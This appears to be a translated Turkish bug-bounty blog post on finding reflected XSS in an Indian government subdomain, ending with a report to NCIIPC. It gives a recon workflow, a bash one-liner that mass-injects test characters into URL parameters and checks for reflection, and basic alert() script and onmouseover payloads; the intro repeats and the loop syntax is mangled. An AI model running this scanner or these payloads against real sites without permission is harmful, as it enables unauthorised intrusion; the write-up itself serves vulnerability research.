*.GOV.IN'de Reflected XSS'yi nasıl buldum?

May 02 2023
Bu blog, herhangi bir web uygulamasındaki tüm savunmasız parametreleri bulmanıza yardımcı olacaktır. Ayrıca, herhangi bir web sitesine yaklaşarak XSS ve SQLI gibi güvenlik açıklarından nasıl yararlanacağınızı da öğretecektir.

Bu blog, herhangi bir web uygulamasındaki tüm savunmasız parametreleri bulmanıza yardımcı olacaktır. Ayrıca, herhangi bir web sitesine yaklaşarak XSS ve SQLI gibi güvenlik açıklarından nasıl yararlanacağınızı da öğretecektir.

Yansıtılmış XSS nedir:

Yansıtılmış siteler arası komut dosyası çalıştırma (veya XSS), bir uygulama bir HTTP isteğindeki verileri aldığında ve bunları uygun şekilde filtrelemeden ve temizlemeden yanıt içinde sakladığında oluşan bir güvenlik açığıdır.

Adım adım ilerleyelim:

Etki alanını seçin: *.gov.in

1. Adım: Seçilen alan adı altındaki tüm olası alt alan adlarını bulun

2. Adım: Herhangi bir alt alan adı seçin

3. Adım: Paramspider gibi bir aracı kullanarak olası tüm parametreleri bulun

Adım 4: Doğrudan özel karakterleri yansıtan tüm url'leri inceleyin.

Otomatikleştirmek için aşağıdaki betiği kullanın:

cat urls.txt| egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && echo -e "$host \033[91m Vullnerable \e[0m \n" || echo -e "$host  \033[92m Not Vulnerable \e[0m \n"; done | tee XSS.txt

      
                

Adım 5: Şimdi Manuel Olarak Deneyin:

Temel XSS yükünü deneyelim:

"><script>alert(1);</script>

Yükü girin

Açılır Pencere Yok:

Hadi baştan başlayalım:

Şununla deneyin: tek alıntı

'

      
                
No Errors

Şimdi bazı olaylarla deneyin:

' onmouseover=alert(1);>

      
                

Kaynak kodunu görelim:

XSS aldık, Şimdi NCIIPC'ye rapor verin

İletişim:

https://www.linkedin.com/in/prince-prafull-19a477194/